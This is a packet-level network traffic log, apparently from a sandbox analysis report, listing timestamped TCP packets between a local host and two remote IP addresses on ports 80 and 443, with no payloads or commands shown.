Sep 27, 2024 01:49:55.368913889 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.368923903 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.368935108 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.368937016 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.368995905 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.369005919 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.369016886 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.369057894 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.369544983 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.369642019 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.369653940 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.369666100 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.369677067 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.369688988 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.369699955 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.369714975 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.369726896 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.369738102 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.369750977 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.369781971 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.369781971 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.369781971 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.370327950 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.370354891 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.370367050 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.370379925 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.370392084 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.370403051 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.370417118 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.370449066 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.370462894 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.370476007 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.370488882 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.370500088 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.370506048 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.370512962 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.370526075 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.370537996 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.370543957 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.370609999 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.370609999 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.371299028 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.371309996 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.371336937 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.371349096 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.371361017 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.371371031 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.371412992 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.371424913 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.371443987 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.371459961 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.371469021 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.371471882 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.371484041 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.371490002 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.371490002 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.371490002 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.371495962 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.371531010 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.371548891 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.372251987 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.372263908 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.372275114 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.372309923 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.372358084 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.388622999 CEST	443	49741	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:55.388705969 CEST	443	49741	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:55.388803005 CEST	49741	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:55.389028072 CEST	49741	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:55.389036894 CEST	443	49741	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:55.391779900 CEST	49745	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:55.391810894 CEST	443	49745	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:55.391892910 CEST	49745	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:55.392488956 CEST	49745	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:55.392503023 CEST	443	49745	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:55.413294077 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.413490057 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.413816929 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.453699112 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.453748941 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.453774929 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.453789949 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.453805923 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.453855038 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.453865051 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.453865051 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.453869104 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.453902960 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.456167936 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.456192017 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.456207991 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.456223011 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.456238985 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.456250906 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.456290960 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.456300020 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.456300974 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.456314087 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.456350088 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.456366062 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.456379890 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.456394911 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.456409931 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.456410885 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.456423044 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.456459045 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.460594893 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.460628033 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.460663080 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.460675001 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.460676908 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.460692883 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.460707903 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.460728884 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.460745096 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.460755110 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.460761070 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.460761070 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.460818052 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.460990906 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.461024046 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.461045980 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.461061001 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.461076021 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.461086035 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.461101055 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.461116076 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.461142063 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.461184025 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.461239100 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.461252928 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.461266994 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.461282969 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.461297989 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.461313009 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.461323977 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.461323977 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.461337090 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.461352110 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.461366892 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.461380959 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.461404085 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.461436987 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.461436987 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.461436987 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.461436987 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.461560011 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.461620092 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.461635113 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.461678028 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.461680889 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.461695910 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.461781025 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.461796045 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.461796045 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.461824894 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.461832047 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.461853027 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.461877108 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.461884022 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.461899042 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.461925030 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.461941004 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.461956024 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.461957932 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.461957932 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.461971045 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.462016106 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.462218046 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.462232113 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.462246895 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.462270975 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.462286949 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.462306976 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.462306976 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.462435007 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.462450981 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.462477922 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.462482929 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.462501049 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.462515116 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.462528944 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.462546110 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.462552071 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.462552071 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.462560892 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.462574959 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.462589025 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.462593079 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.462605000 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.462613106 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.462618113 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.462635040 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.462650061 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.462656975 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.462686062 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.462729931 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.462949038 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.462964058 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.462979078 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.463007927 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.463011980 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.463027954 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.463042974 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.463082075 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.463104010 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.463104010 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.463114977 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.463136911 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.463152885 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.463167906 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.463181973 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.463196039 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.463197947 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.463208914 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.463213921 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.463228941 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.463231087 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.463244915 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.463259935 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.463264942 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.463357925 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.463629007 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.463644028 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.463659048 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.463701010 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.463732004 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.463759899 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.463774920 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.463788986 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.463803053 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.463839054 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.463861942 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.463871002 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.463871002 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.463891983 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.463907003 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.463922024 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.463936090 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.463951111 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.463954926 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.463954926 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.463965893 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.463980913 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.463996887 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.464010954 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.464025974 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.464040995 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.464118004 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.464118004 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.464118004 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.464118004 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.512698889 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.546230078 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.546276093 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.546288967 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.546360970 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.546372890 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.546385050 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.546421051 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.546427011 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.546478033 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.548607111 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.548619986 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.548633099 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.548644066 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.548656940 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.548676968 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.548676968 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.548692942 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.548703909 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.548710108 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.548754930 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.552865982 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.552953005 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.552963018 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.553041935 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.553054094 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.553073883 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.553081036 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.553081036 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.553092957 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.553105116 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.553123951 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.553142071 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.553147078 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.553147078 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.553153992 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.553172112 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.553186893 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.553198099 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.553205013 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.553210974 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.553246021 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.553246021 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.553267002 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.553278923 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.553330898 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.553411961 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.553445101 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.553457022 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.553459883 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.553493023 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.553554058 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.553567886 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.553649902 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.553661108 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.553669930 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.553669930 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.553673029 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.553678989 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.553684950 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.553695917 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.553718090 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.553718090 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.553766966 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.553778887 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.553791046 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.553803921 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.553813934 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.553824902 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.553837061 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.553893089 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.553893089 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.553915024 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.553915024 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.553940058 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.553951979 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.553961992 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.553987980 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.553992987 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.554001093 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.554013968 CEST	80	49743	147.45.44.104	192.168.2.8
